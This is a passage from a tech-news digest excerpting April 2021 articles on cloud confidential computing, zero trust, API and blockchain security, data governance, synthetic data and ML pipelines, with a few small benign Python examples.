Daily Tech Digest - April 06, 2021

How Confidential Computing is dispelling the climate of distrust around cloud security

Confidential Computing offers a number of additional advantages that go beyond simple safeguarding. By ensuring that data is processed in a shielded environment, it is possible to securely collaborate with partners without compromising IP or divulging proprietary information. ... Until now, many enterprises have held back from migrating some of their most sensitive applications to the cloud because of worries about data exposure. Confidential computing addresses this hurdle; not only is data protected during processing, but companies can also securely and efficiently collaborate with partners in the cloud. For businesses migrating workloads into the cloud, a major concern is the ability to provide security for customers and continued compliance with EU data privacy regulations. This is especially the case where businesses are the stewards of sensitive data, such as healthcare information or bank account numbers. An important feature of Confidential Computing is its use of embedded encryption keys, which lock data in a secure enclave during processing. This keeps it concealed from the operating system as well as any privileged users, such as administrators or site reliability engineers.


A Good Data Scientist Should Combine Domain-Specific Knowledge With Technical Competence

Technological expertise augmented by strong domain knowledge is important for an aspiring data scientist. One should have a clear understanding of the rules and practices of the industry before applying technological aspects to it. Be it automotive, BFSI, manufacturing or ecommerce, you can be a good data scientist in the field if you couple domain-specific knowledge with technical competence. Ideal candidates would have a degree or background knowledge in computer science or information technology. Data science is vast and may not suit everyone. Therefore, it is vital to have an aptitude to understand the data, see patterns, analyse from different perspectives and present findings to suit the end-user while also being open to understanding the domain. ... Industry partnerships are crucial to educational institutions. The two key components of a data science course are the fundamental conceptual foundation laid by highly qualified academicians, and the on-ground expertise and visibility of industry stalwarts. Both ensure that the key takeaways are beyond theoretical knowledge and include practical insights and understanding.


Can Digital Twins Help Modernize Electric Grids?

Digital twins could help guide decision-making as California completes its transition to 100% renewables, according to Parris, who points out that GE Digital is working with Southern California Edison, one of the state’s three largest investor-owned utilities, to help model its operations. However, the mix of renewables in the Golden State, not to mention Gov. Gavin Newsom’s ban on gasoline- and diesel-powered cars starting in 2035, will make it much harder to find a balance than in the Lone Star State. “It’s not just the heating [and cooling] of the buildings, but the cars,” Parris says. “It will be more distributed energy resources, like EVs [electric vehicles]. How do I bring them in? They add another complexity, because I don’t know when you’re going to charge your EV. I don’t know how much you’re going to use your car.” Backers of renewable energy are banking on large battery plants being able to handle short-term spikes in energy demand that have traditionally been handled by natural gas-powered “peaker” plants in California. But grid-scale battery technology is still unproven, and it also introduces more variables into the grid equation that will have to be accounted for. “How long does that battery live [is] based on how often you charge and discharge it, so the life of the battery is a factor,” Parris says.


Stop Calling Everything AI, Machine-Learning Pioneer Says

Computers have not become intelligent per se, but they have provided capabilities that augment human intelligence, he writes. Moreover, they have excelled at low-level pattern-recognition capabilities that could be performed in principle by humans but at great cost. Machine learning–based systems are able to detect fraud in financial transactions at massive scale, for example, thereby catalyzing electronic commerce. They are essential in the modeling and control of supply chains in manufacturing and health care. They also help insurance agents, doctors, educators, and filmmakers. Despite such developments being referred to as “AI technology,” he writes, the underlying systems do not involve high-level reasoning or thought. The systems do not form the kinds of semantic representations and inferences that humans are capable of. They do not formulate and pursue long-term goals. “For the foreseeable future, computers will not be able to match humans in their ability to reason abstractly about real-world situations,” he writes. “We will need well-thought-out interactions of humans and computers to solve our most pressing problems. ...”


AI And HR Tech: Three Critical Questions Leaders Need To Support Diverse Teams

When dealing with HR AI tech, the limitations around diversity are the by-product of how solutions are designed. We are rapidly moving into a space where solutions provide emotional recognition. AI analyzes facial expressions or body posture to determine decisions around recruitment. Current estimates project emotion recognition to be worth $25 billion by 2023. Despite extraordinary growth in this area, there are challenges and significant kinks to be addressed, namely, ethical elements concerning the creation of the algorithms. Companies are grappling with HR AI and ethics. Recent examples demonstrate the enormity of the ramifications when things don't go according to plan. In other words, when things go wrong, they go badly wrong. Consider, for example, Uber, when fourteen couriers were fired due to a failure of recognition by facial identification software. In this case, the technology based on Microsoft's face-matching software has a track record of failing to identify darker-skinned faces, with a 20.8 percent failure rate for darker-skinned female faces. The same technology has a zero percent failure rate for white men.


How AI Can Solve The COBOL Challenge

Fortunately, using an old-school approach to AI and applying that to a different scope of the problem can save developers time in finding code by automating the process of precisely identifying the code that requires attention — regardless of how spread out it might be. Much like how contemporary AI tools cannot comprehend a book in a way a human does, human developers struggle to comprehend the intent of previous developers encoded in the software. By describing to AI tools the behaviors that need to change, developers no longer have to labor over searching through and understanding code to get to the specific lines implementing that behavior. Instead, developers can quickly and efficiently find potential bugs. Rather than dealing with a deluge of code and spending weeks searching for functionality, developers can collaborate with the AI tool to rapidly get to the code on which they need to work. This approach requires a different kind of AI: one that doesn’t focus on assisting the developer with syntax. Instead, AI that focuses on understanding the intent of the code is able to “reimagine” what computation represents into concepts, thereby doing what a developer does when they code — but at machine speed.


Secure API Design With OpenAPI Specification

API security is at the forefront of cybersecurity. Emerging trends and technologies like cloud-native applications, serverless, microservices, single-page applications, and mobile and IoT devices have led to the proliferation of APIs. Application components are no longer internal objects communicating with each other on a single machine within a single process — they are APIs talking to each other over a network. This significantly increases the attack surface. Moreover, by discovering and attacking back-end APIs, attackers can often bypass the front-end controls and directly access sensitive data and critical internal components. This has led to the proliferation of API attacks. Every week, there are new API vulnerabilities reported in the news. OWASP now has a separate list of top 10 vulnerabilities specifically for APIs. And Gartner estimates that by 2022, APIs are going to become the number one attack vector. Traditional web application firewalls (WAF) with their manually configured deny and allow rules are not able to determine which API call is legitimate and which one is an attack. For them, all calls are just GETs and POSTs with some JSON being exchanged.
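To make the contrast concrete, here is a minimal sketch (not from the article) of the "positive security" idea behind an OpenAPI-driven approach: instead of deny-listing attack patterns, the API accepts only payloads that match a declared schema. The endpoint, field names and limits are hypothetical, and the check uses the Python jsonschema library.

```python
# Minimal sketch of schema-based ("positive") request validation.
# The schema mirrors what might appear under an OpenAPI components/schemas entry.
from jsonschema import validate, ValidationError  # pip install jsonschema

transfer_schema = {
    "type": "object",
    "additionalProperties": False,          # unknown fields are rejected outright
    "required": ["account_id", "amount"],
    "properties": {
        "account_id": {"type": "string", "pattern": "^[0-9]{10}$"},
        "amount": {"type": "number", "exclusiveMinimum": 0, "maximum": 10000},
    },
}

def is_legitimate(payload: dict) -> bool:
    """Return True only if the request body conforms to the declared contract."""
    try:
        validate(instance=payload, schema=transfer_schema)
        return True
    except ValidationError:
        return False

print(is_legitimate({"account_id": "0123456789", "amount": 250.0}))   # True
print(is_legitimate({"account_id": "0123456789", "amount": 250.0,
                     "role": "admin"}))                                # False: extra field
```

With a contract like this in place, a call is judged against what the API is supposed to accept rather than against a list of known attack signatures, which is the distinction the paragraph above draws against traditional WAF rules.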


Zero Trust creator talks about implementation, misconceptions, strategy

“The strategic concepts of Zero Trust have not changed since I created the original concept, though I have refined some of the terminology,” he told Help Net Security. “I used to say that the first step in the five-step deployment model was to ‘Define Your Data.’ Now I say that the first step is to ‘Define Your Protect Surface.’ My idea of a protect surface centers on the understanding that the attack surface is massive and always growing and expanding, which makes dealing with it an unscalable problem. I have inverted the idea of an attack surface to create protect surfaces, which are orders of magnitude smaller and easily known.” Among the pitfalls that organizations opting to implement a zero-trust model should try to avoid, he singles out two: thinking that Zero Trust is binary (that either everything is Zero Trust or none of it is), and deploying products without a strategy. “Zero Trust is incremental. It is built out one protect surface at a time so that it is done in an iterative and non-disruptive manner,” he explained. He also advises starting with creating zero-trust networks for the least sensitive/critical protect surfaces first, and then slowly working one’s way towards implementing Zero Trust for the more critical and, finally, the most critical ones.


How can businesses gain the most value from their cloud investments?

Innovation can come from the smallest and simplest of places. And the chances are, the cloud can take your business there, whether it’s to be more productive or agile, more sustainable, or secure. The important thing is for this vision to be clear, well communicated, and considered in all tech investments, hires and processes. For example, if a business wants to make better use of data across its operations, technologies such as IoT, AI and robotics will be critical to gathering, deciphering, and actioning that data across the cloud. Businesses will also be hiring and developing the talent to operate these tools. And we know this isn’t easy. UK businesses are hungry for cloud computing skills and the talent pool is not as big as they would like. They will also be thinking about the platforms available that enable the entire organisation — not just the tech team — to partake in this culture of data-driven operations. On the other hand, perhaps a business wants their cloud investment to bring them cost savings — a key driver for many migrations. To do so successfully, CIOs will need to think strategically about how they are leveraging the cloud’s pay-as-you-go ‘as a service’ model, and whether they are using technologies, such as cloud virtualisation, to be more efficient or unlock revenue opportunities.


NFT Thefts Reveal Security Risks in Coupling Private Keys & Digital Assets

Like other blockchain-based platforms, NFT marketplaces are targeted by hackers. The centralized design of the marketplaces and the high value attached to NFTs make them prized targets. They can be subject to a range of attack vectors, including phishing, insider threats, supply chain attacks, brute-force attacks against account credentials, ransomware, and even distributed denial-of-service attacks. Blockchain design encompassing NFTs provides certain fundamental properties applicable to security, such as immutability and integrity checks. Immutability inherent in blockchain design is considered one of the core tenets of any transaction-security strategy. It's introduced to create a single source of truth and supports nonrepudiation, which is crucial for accountability of actions. But this still does not guard the platform against attacks leading to an account takeover (ATO), a major threat. There is a clear, exploitable scenario here: once an NFT has been transferred to someone else's wallet or sold, it may not be recovered by the sender or a third party. Enabling private keys to serve as gatekeepers is bound to create concentrated risk in one area, leading to a single-point-of-failure scenario.



Quote for the day:

"Most people live with pleasant illusions, but leaders must deal with hard realities." -- Orrin Woodward

Daily Tech Digest - April 05, 2021

Encrypted method that measures encounters could slow down or prevent future pandemics

Current approaches for mitigating the spread of infectious disease in a population include exposure notification systems, also known as contact tracing, that rely on pseudonyms. These systems are currently used on smartphones as a way to digitally track if a person comes into contact with someone who has contracted COVID-19. This can help health officials mitigate the spread of the disease by isolating individuals at risk of infecting others. But the benefit of this method that uses encounter IDs is its promotion of privacy. By labeling each encounter with a random number and not linking the encounter to the device the person is carrying, this makes it much harder for a cyber attacker to obtain that user’s identity. The target audience for this approach would be a smaller population in a controlled setting like NIST’s campus or nursing homes, said researcher Angela Robinson, also an author of the new paper. “We are advancing a different approach to contact tracing using encounter metrics.” Gathering these measurements of how individuals interact with one another can help with better understanding ways of modifying working environments, such as altering building layouts and establishing mobility rules, so as to slow the spread of disease.
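The paper's actual protocol is more involved, but a toy sketch in Python can illustrate the core privacy idea: each encounter gets a fresh random label that is never derived from a device identifier, and only a hash of it needs to be retained. The function and field names here are illustrative, not NIST's.

```python
# Toy illustration only; this is not the NIST encounter-metrics protocol.
import hashlib
import secrets

def record_encounter(log: list) -> bytes:
    """Label an encounter with a fresh random ID and keep only its hash."""
    encounter_id = secrets.token_bytes(16)   # random, never reused, unrelated to the device
    log.append(hashlib.sha256(encounter_id).hexdigest())
    return encounter_id                      # the value shared with the other device

device_log = []
record_encounter(device_log)
print(device_log[0])   # the stored record reveals nothing about who met whom
```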


Blockchain and taking the politics out of tech

One of the biggest problems and challenges in the world of crypto is how do you make sure that people who are transacting in crypto are not sending money to terrorists or not using crypto to engage in money laundering. And it’s a problem because the whole promise of crypto is to allow people to transact peer to peer without the need for a bank, right? So normally if you’re writing a check, it goes to the banking system and the bank looks to see who the payee is and figures out if they’re on some list, or if you’re using cash there are these currency transaction reports you have to fill out. ... Blockchain identity verification is making probabilistic judgments based on a large amount of data. So, it may not know for sure that you’re not Vladimir Putin. But what it does know is that you’re a person who bought a latte at a Starbucks in Palo Alto yesterday, or that you’re a person who has a Netflix subscription you’ve been paying on for 23 months. And so when we make these probabilistic judgments, we can reduce to a statistical low rate the likelihood that you’re engaged in some kind of malfeasance.


Data lineage: What it is and why it’s important

Data lineage comprises methodologies and tools that expose data’s life cycle and help answer questions around who, when, where, why, and how data changes. It’s a discipline within metadata management and is often a featured capability of data catalogs that allow data consumers to understand the context of data they are utilizing for decision-making and other business purposes. One way to explain data lineage is that it’s the GPS of data that provides “turn-by-turn directions and a visual overview of the completely mapped route.” Others view data lineage as a core datagovops practice, where data lineage, testing, and sandboxes are data governance’s technical practices and automation opportunities. Capturing and understanding data lineage is important for several reasons. Compliance requirements: Many organizations must implement data lineage to stay on the good side of government regulators. Data lineage in risk management and reporting is required for capital market trading firms to support BCBS 239 and MiFID II regulations. For large banks, automating the extraction of lineage from source systems can save significant IT time and reduce risks. In pharmaceutical clinical trials, the ADaM standard requires traceability between analysis and source data.


7 Ways to Reduce Cyber Threats From Remote Workers

This hybrid work model comes with advantages and disadvantages — and among the disadvantages is a sharp rise in the number of cyber threats and vulnerabilities. When employees connect to organizational servers, databases, and intranets via the Internet, they are really working at a remote endpoint of the corporate office. But unlike in office-based environments, they are not as diligently protected. Therefore, CISOs need to view home-based devices as integral parts of IT and mandate that the devices, as well as the people using them, undergo the same level of security as they would when operating from the office. Like any other maturity improvement program, organizations must grapple with the challenges posed by their people (employees, third-party vendors, and so on), processes, and technology and implement the necessary security measures to protect them. ... To avoid breaches, employers need to implement employee training courses with a focus on the latest threat scenarios. Management, operations, and R&D are all prime targets of social engineering, phishing, and scamming campaigns (among other threats). 


How To Remove Ransomware From Android Phone Easily?

First, you will need to restart your phone in safe mode. Different Android phones have different ways of doing this, so find out how to do it on your device. Once you have the right method, your screen will show that your phone is starting in safe mode. When your device is in safe mode, third-party apps are not running. This may or may not include the malware, depending on how it is developed. Once your phone is running in safe mode, you can now check your installed apps. You can do this by going to Settings and then to Apps. In the list of apps installed on your phone, look for apps that you don’t remember installing. When you find an app that looks suspicious, uninstall it from your phone. Depending on how you use your phone, you may have a long list of apps to go through. Make sure to go through all the apps on the device and remove any that are suspicious or that you don’t use often. After you are through with the uninstallation process, head to your phone’s security settings. Here, look for apps under the device administrators section. If you find any suspicious apps in this section, deny them the rights to be administrators on your phone and also uninstall them. They may have let the malware in.


The wholesale financial services firm of the future cannot survive without AI

Compliance is the first major front. Regulatory changes come into effect over the course of the next year which require forensic oversight of large amounts of documentation: a task that is too slow, error-prone and expensive to be completed manually. LIBOR, Basel IV and Dodd-Frank QFC recordkeeping requirements place more and more demands on financial services companies and many simply aren’t adequately prepared. ... The second area is market risk. The volatility of markets in the past year means that transparent oversight is critical. This is where AI comes into its own. AI technology can automate the processing and analysis of the documentation which underpins much of the financial system, from loan agreements to insurance policies. This means that work which would previously have entailed long hours can be accelerated, allowing for vastly improved efficiency and speed and, critically, much better oversight of the compliance requirements which regulators mandate. AI gives institutions the ability to remain vigilant and to keep abreast of risks with much more efficiency than ever before. With market conditions likely to remain volatile throughout 2021, fast, responsive and data-backed decisions aren’t only essential for each institution, they are critical for the health of the financial system as a whole.


Fake Unemployment Benefit Websites Preying On Laid-Off Workers, Experts Warn

You may want to take several additional steps to avoid these and other scams, says Sadler, whose company uses artificial intelligence to detect patterns in legitimate and potentially fraudulent emails and to automatically block potential threats. Besides considering an email security system at home or work, Sadler said, “It’s important for people to employ two-factor authentication and to not use the same password across different sites — those are two of the best steps you can take” for better online security. He also suggests getting a password manager, such as RoboForm, 1Password, Keeper, Norton, or a similar tool that can generate your passwords, distribute them across multiple sites, and protect them with encryption software to guard against hackers. Don’t automatically trust an email asking for private information even if the email address looks legitimate, he added. “People may be trained to look out for [bizarre requests],” Sadler said, “and they may be on alert if the email address is unfamiliar. But sometimes the email account itself is compromised, and the phishing email is using a falsified IP address... If you're unsure, you can verify the legitimacy of the sender by calling the organization directly.”


AI at Your Service

From a CX and EX optimization perspective, the point of an AI system is to increase automation efficiencies. If AI can resolve an issue while communicating in a humanlike manner, operations have been optimized effectively and that particular issue doesn’t need to be escalated to a live person and tap into limited resources. ... This also empowers the employees to refocus on more complex, rewarding tasks that require human attention. Let’s look at an example of how AI is utilized in the healthcare industry. A patient comes in with a skin problem. If it’s an anomaly, the doctor may have to do more research, run a series of tests, get a second opinion, etc. Compare that to an AI system, which can look at hundreds and thousands of cases of a similar skin condition and, in a nanosecond, give a diagnosis that’s 90% accurate. That’s a genuine interactive process between a human and an AI system. In addition to reducing costs and freeing up personnel for more business-critical tasks, AI can build brand loyalty for an organization. In Formation.ai’s study, Brand Loyalty 2020: The Need for Hyper-Individualization, 79% of consumers stated that the more personalized tactics a brand uses, the more loyal the customer is to the brand. In fact, 81% of consumers will share basic personal information in exchange for a more personalized customer experience.


What is a streaming database?

Some streaming databases are designed to dramatically reduce the size of the data to save storage costs. They can, say, replace a value collected every second with an average computed over a day. Storing only the average can make long-term tracking economically feasible. Streaming opens up some of the insides of a traditional database. Standard databases also track a stream of events, but they’re usually limited to changes in data records. The sequence of INSERTs, UPDATEs, and DELETEs is normally stored in a hidden journal or ledger inside. In most cases, the developers don’t have direct access to these streams. They’re only offered access to the tables that show the current values. Streaming databases open up this flow and make it simpler for developers to adjust how the new data is integrated. Developers can adjust how the streams from new data are turned into tabular summaries, ensuring that the right values are computed and saved while the unneeded information is ignored. The opportunity to tune this stage of the data pipeline allows streaming databases to handle markedly larger datasets.
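As a rough illustration of the downsampling idea described above (reducing a per-second stream to one value per day), consider the sketch below; the event format and field names are invented for the example.

```python
# Illustrative sketch only: collapsing a per-second stream into one average per day,
# the kind of rollup that keeps long-term storage cheap.
from collections import defaultdict
from datetime import datetime

daily_sum = defaultdict(float)
daily_count = defaultdict(int)

def ingest(event):
    """event: {'ts': ISO-8601 string, 'value': float} arriving from the stream."""
    day = datetime.fromisoformat(event["ts"]).date()
    daily_sum[day] += event["value"]
    daily_count[day] += 1

def daily_average(day):
    return daily_sum[day] / daily_count[day]

ingest({"ts": "2021-04-05T10:15:00", "value": 3.0})
ingest({"ts": "2021-04-05T10:15:01", "value": 5.0})
print(daily_average(datetime(2021, 4, 5).date()))  # 4.0, the only value kept long-term
```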


Why Data Democratization Should Be Your Guiding Principle for 2021

Data, and universal access to it, is key for today’s companies to create new opportunities and unlock the value embedded within their organization – all of which can positively impact a company’s top and bottom line. True data democratization pushes organizations to rethink and maybe even restructure, which often means driving a dramatic cultural change in order to realize financial gain. It also means freeing information from the silos created by internal departmental data, customer data, and external data, and turning it into a borderless ecosystem of information. The trouble is many companies aren’t that good at it. Our research last year initially suggested senior decision-makers were confident that they were opening up access to data sufficiently. However, when we scratched a little deeper, we found almost half (46%) of respondents believed that data democratization wasn’t feasible for them. IT infrastructure challenges were cited by almost four out of five respondents as a blocker to democratizing data in their organization. Performance limitations, infrastructure constraints, and bottlenecks are all standing in the way.



Quote for the day:

"Don't necessarily avoid sharp edges. Occasionally they are necessary to leadership." -- Donald Rumsfeld

Daily Tech Digest - April 04, 2021

Compositional AI: The Future of Enterprise AI

Compositionality refers to the ability to form new (composite) services by combining the capabilities of existing (component) services. The existing services may themselves be composite, leading to a hierarchical composition. The concept is not new, and has been studied previously in different contexts; most notably, Web Services Composition and Secure Composition of Security Protocols. Web Services follow the Service Oriented Computing (SOC) approach of wrapping a business functionality in a self-contained Service. There are mainly two approaches to composing a service: dynamic and static. In the dynamic approach, given a complex user request, the system comes up with a plan to fulfill the request depending on the capabilities of available Web services at run-time. In the static approach, given a set of Web services, composite services are defined manually at design-time combining their capabilities. ... In the very primitive world of supervised learning, an AI Service consists of data used to train a model, which is then exposed as an API. There is of course an alternate deployment pipeline, where a trained model can be deployed on an edge device to be executed in an offline fashion.
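A minimal sketch of the "static" composition described above, assuming two existing AI services are already exposed behind callable interfaces; the service names and return values are placeholders, not a real API.

```python
# Hedged sketch: two component AI services (stand-ins for deployed model APIs)
# are wired into a composite service at design time.
def ocr_service(image_bytes: bytes) -> str:
    return "INVOICE TOTAL: 42.00"        # placeholder for a deployed OCR model

def entity_service(text: str) -> dict:
    return {"total": 42.00}              # placeholder for an extraction model

def invoice_reader(image_bytes: bytes) -> dict:
    """Composite service: the capabilities of the two components combined."""
    return entity_service(ocr_service(image_bytes))

print(invoice_reader(b"..."))            # {'total': 42.0}
```

In a dynamic-composition setting, the same wiring would instead be chosen at run-time from whatever component services are available to satisfy the request.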


Four common pitfalls of HyperLedger implementation

One of the main goals of distributed ledger technology (DLT), used by HyperLedger, is decentralization. The nodes (servers) of the network should be spread among all organizations in the consortium and they should not depend on third-party providers. However, we have seen implementations where the whole infrastructure is maintained by one organization, or where it is spread among the organizations but all of them host their nodes with the same cloud vendor (e.g. AWS). With centralized infrastructure comes the threat that one organization or external provider could easily turn off the system and thus break the principal goal of DLT. ... One of the extremes in defining permissions in the DLT network, contrary to limiting the access of an organization, is privileging one of the organizations in such a way that it can make any changes to the distributed ledger. While such a configuration does not have to introduce a vulnerability, it is against blockchain rules. We have seen different implementations with this issue that all allowed one organization to freely modify the contents. The channel endorsement policy required a signature from only one organization.
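The endorsement-policy pitfall can be illustrated generically. The sketch below is not Hyperledger Fabric code; it just shows why requiring endorsement from a majority of consortium members is stronger than accepting a signature from any single organization.

```python
# Generic illustration (not Fabric syntax) of weak vs. majority endorsement.
CONSORTIUM = {"OrgA", "OrgB", "OrgC"}

def satisfies_policy(endorsing_orgs: set, majority: bool = True) -> bool:
    if majority:
        # strong policy: more than half of the consortium must endorse
        return len(endorsing_orgs & CONSORTIUM) > len(CONSORTIUM) // 2
    # the weak, single-organization policy described above
    return len(endorsing_orgs & CONSORTIUM) >= 1

print(satisfies_policy({"OrgA"}))           # False: one org alone cannot commit changes
print(satisfies_policy({"OrgA", "OrgB"}))   # True: a majority endorsed
```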


ETL vs. Data Preparation

ETL relies on a predetermined set of rules and workflows, she said. Potential issues, such as misspellings or extra characters, must be anticipated beforehand so rules for how to deal with those issues can be built into the end-to-end workflow. Conversely, a data prep tool using built-in algorithms is capable of discovery and investigation of the data as it proceeds through the workflow. “For example, algorithms based on machine learning or natural language processing can recognize things that are spelled differently but are really the same.” She gave the example of a city called “St. Louis”, and how it could be entered in multiple ways, or there may be several cities with the same name spelled differently. In an ETL workflow, rules for encountering each particular variation must be programmed ahead of time, and variations not programmed are skipped. A data prep tool can find spelling differences without help, so that the user does not have to anticipate every possible variation. The tool can prompt for a decision on each different variation on the name of this city, providing an opportunity to improve the data before it’s used, she said.
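As a rough illustration of the difference, the snippet below groups spelling variants of "St. Louis" using a generic string-similarity measure from Python's standard library, with no hand-written rule for each variant; it is not the vendor's algorithm, just the general idea of discovering variations instead of anticipating them.

```python
# Illustrative sketch: find near-duplicate spellings without pre-written rules.
from difflib import get_close_matches

observed = ["St. Louis", "Saint Louis", "St Louis", "St. Loui", "Chicago"]
canonical = "St. Louis"

variants = get_close_matches(canonical, observed, n=10, cutoff=0.7)
print(variants)   # picks up the near-duplicates, leaves "Chicago" alone
```

An ETL workflow would need an explicit rule for each of these spellings ahead of time; anything not anticipated would simply pass through or be skipped.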


The coming opportunity in consumer lending

The second major step is to build the decision engine. In this area, new entrants will have a large advantage over existing lenders with legacy software that they do not want to alter. The new decision engine can largely be built using advanced analytics, machine learning, and other tools that capitalize on speed and agility. By using machine learning, the new-entrant lenders will be able to automate as much as 95 percent of underwriting processes while also making more accurate credit decisions. Similarly, real-time machine-learning solutions can improve pricing and limit setting and help firms monitor existing customers and credit lines through smarter early-warning systems. Lenders can also use straight-through processing to generate faster transactions and a better customer experience. The design of the decision engine can be modular for maximum flexibility. That will allow lenders to retain control of strategic processes while potentially outsourcing other parts. The modular format can also facilitate risk assessment. This approach involves a series of steps, completely integrated from the front end to the back end, and is designed for objective and quick decision making


WhatsApp Privacy Controversy and India’s Data Protection Bill

Clause 40 of the PDP bill is particularly dangerous and could be detrimental to the data rights of the users of WhatsApp. This provision empowers the Data Protection Authority to include certain data fiduciaries in a regulatory sandbox who would be exempt from the obligation of taking the consent of the data principal in processing their data for up to 36 months. The GDPR does not have any provision related to the regulatory sandbox. Such a sandbox might be required to provide relaxations to certain corporations, such as those that deal with Artificial Intelligence so that they can test their technology in a Sandbox environment. However, it is a commonly accepted practice that in a good regulatory sandbox the users whose data is taken voluntarily participate in the exercise. Such a condition is altogether done away with by this provision. The authority that has to assess the applications for inclusion in a regulatory Sandbox is the Data Protection Authority (DPA). The members of the DPA are to be selected by bureaucrats serving under the Union government. So, it cannot be expected to work independently of government control (Clause 42(2)).


A Data Science Wish List for 2021 and Beyond

Sometimes, we simply cannot overcome the problem of needing more data. It could be that data collection is too expensive or the data is not possible to collect in a reasonable time frame. This is where synthetic data can provide real value. Synthetic data can be created by training a model to understand available data to such an extent that it can generate new data points that look, act, and feel real, i.e. mimic the existing data. An example could be a model that predicts how likely small and medium-sized businesses (SMBs) in the retail sector might be to default on loans. Factors such as location, number of employees, and annual turnover, might be key features in this scenario. A synthetic data model could learn the typical values of these features and create new data points that fit seamlessly into the real dataset, which can then be expanded and used to train an advanced loan default prediction model. ... Another benefit of synthetic data is data privacy. In the financial services industry, much of the data is sensitive and there are many legal barriers to sharing datasets. Leveraging synthetic data is one way we can reduce these barriers as synthetic datapoints feel real but do not relate to real accounts and individuals.
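A deliberately oversimplified sketch of the SMB example above (real synthetic-data generators are far more sophisticated): learn the joint distribution of a couple of numeric features and sample artificial rows that resemble the originals. All figures are made up.

```python
# Greatly simplified sketch of synthetic data generation.
import numpy as np

rng = np.random.default_rng(0)

# Illustrative "real" data: columns = [number_of_employees, annual_turnover_millions]
real = np.array([[12, 1.4], [35, 3.9], [8, 0.9], [50, 6.1], [22, 2.5]])

mean = real.mean(axis=0)
cov = np.cov(real, rowvar=False)

# Sample 100 synthetic SMBs that follow the learned distribution but
# correspond to no real business.
synthetic = rng.multivariate_normal(mean, cov, size=100)
print(synthetic[:3])
```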


Top 4 Blockchain Risks A CIO Should Know

Blockchain risks lead to malicious activities such as double-spending and record hacking, which means a hacker will try to steal a blockchain participant’s or cryptocurrency owner’s credentials and transfer money to his/her account or hold the credentials as leverage for ransom. As per MIT’s 2019 report, since 2017, hackers have stolen around $2 million worth of cryptocurrency. Another malicious activity is double-spending, where hackers gain control of a majority of the network’s computing power and rewrite the transaction history. This allows them to spend the cryptocurrency and erase the transaction from history once they receive their orders. With digital money, the hacker can send the merchant a copy of the digital token while retaining the original token and using it again. Implementing and maintaining blockchain applications and platforms is expensive. If there is a fault in the workings or the system fails due to these blockchain risks, it will cost a massive amount of money to fix things. A blockchain expert is required to overcome such risks, and the expert may charge a hefty amount to provide solutions.


Top Challenges Involved In Healthcare Data Management

Medical data is sensitive and must adhere to government regulations, such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA) in the US. Data discovery challenges and poor data quality make it much more difficult to perform the required audits, meet regulatory requirements and limit the diversity of data healthcare providers can use for the benefit of patients. Adhering to the HIPAA rules may help in effective data governance. Effective data governance within a healthcare organization can help better manage and use data, create processes for resolving data issues and eventually, and enable users to make decisions based on high-quality information assets. However, all this begins with better data collection and making sure that the data collected is accurate, up-to-date, complete, and in compliance with the HIPAA regulatory standards. A well-designed HIPAA-compliant web form solution can be instrumental in enabling healthcare organizations to manage and streamline data collection processes, including – new patient forms, HIPAA release forms, contact update forms, patient medical history forms, and consent forms.


CDO's Next Major Task: Enabling Data Access for Non-Analysts

Unlike product managers from two decades ago, today's product manager wants to look at the user flow data on the website and design changes to the UX flow to improve revenue. He doesn't have the luxury of a dedicated analyst supporting him for every question he has about his product. The marketing manager has direct hands-on access to the CRM system. He is pulling targeted customers for the next campaign and needs to have a lifetime value score for each of the customers to target the highest-value customers effectively. To resolve customer concerns quickly, customer support agents need access to what happened when the customer accessed the website two days ago. The agent doesn't have the luxury of yesteryear's one-week resolution SLA; the customer expects resolution during the call. The CDO needs a proper plan to enable appropriate access to the right kind of data to the right person, with the right security level. Barring that, the business's numerous stakeholders will start standing up their individual mini data marts to serve their needs. If that happens, the CDO's past five years of centralizing data sources will amount to nothing. What is needed is a proper data access strategy and governance for the entire enterprise.


Why ML should be written as pipelines from the get-go

Data scientists are not trained or equipped to be diligent about production concepts such as reproducibility — they are trained to iterate and experiment. They don’t really care about code quality, and it is probably not in the best interest of the company at an early point to be super diligent in enforcing these standards, given the trade-off between speed and overhead. Therefore, what is required is a framework that is flexible but enforces production standards from the get-go. A very natural way of implementing this is via some form of pipeline framework that exposes an automated, standardized way to run ML experiments in a controlled environment. ML is inherently a process that can be broken down into individual, concrete steps (e.g. preprocessing, training, evaluating, etc.), so a pipeline is a good solution here. Critically, by standardizing the development of these pipelines at the early stages, organizations can break the cycle of destroying and recreating ML models across multiple toolings and steps, and hasten the speed of research to deployment.
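As one possible concrete form of this, the sketch below uses scikit-learn's Pipeline to declare preprocessing, training and evaluation as explicit, ordered steps; any comparable pipeline framework would serve the same purpose.

```python
# Sketch of an ML workflow expressed as an explicit pipeline of steps.
from sklearn.datasets import load_iris
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

X, y = load_iris(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

pipeline = Pipeline([
    ("preprocess", StandardScaler()),               # step 1: preprocessing
    ("train", LogisticRegression(max_iter=1000)),   # step 2: model training
])

pipeline.fit(X_train, y_train)      # the whole recipe runs the same way every time
print("evaluation:", pipeline.score(X_test, y_test))   # step 3: evaluation
```

Because the steps are declared rather than scattered across notebooks, the same experiment can be re-run, versioned and promoted toward deployment without being rebuilt from scratch.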



Quote for the day:

“Just because you’re a beginner doesn’t mean you can’t have strength.” -- Claudio Toyama

Daily Tech Digest - April 03, 2021

What Is a Cybersecurity Legal Practice?

A cybersecurity attorney is not an auditor; this attorney does not sit in an ivory tower doing oversight of the company’s information technology work. Instead, corporate officers must recognize that a cybersecurity attorney must be a part of the operational team. The attorney should be as involved in the company’s operations as the information technology expert deploying new defensive measures in the company’s networks. An effective cybersecurity attorney has to be in the trenches, helping to develop the statements of work for new contracts, negotiating information-sharing agreements, advising on legal risks associated with the many and varied daily decisions of securing networks, and managing the hour-by-hour response during an incident. ... Finally, a cybersecurity attorney must be multilingual in the jargon of both law and tech. One of the key jobs of such an attorney is to translate legal requirements (such as obligations imposed by regulations) into design requirements and to understand the technical details enough to ask probing questions, spot legal issues and translate risks to organizational leadership.


3 steps to meeting data privacy regulation compliance through identity programs

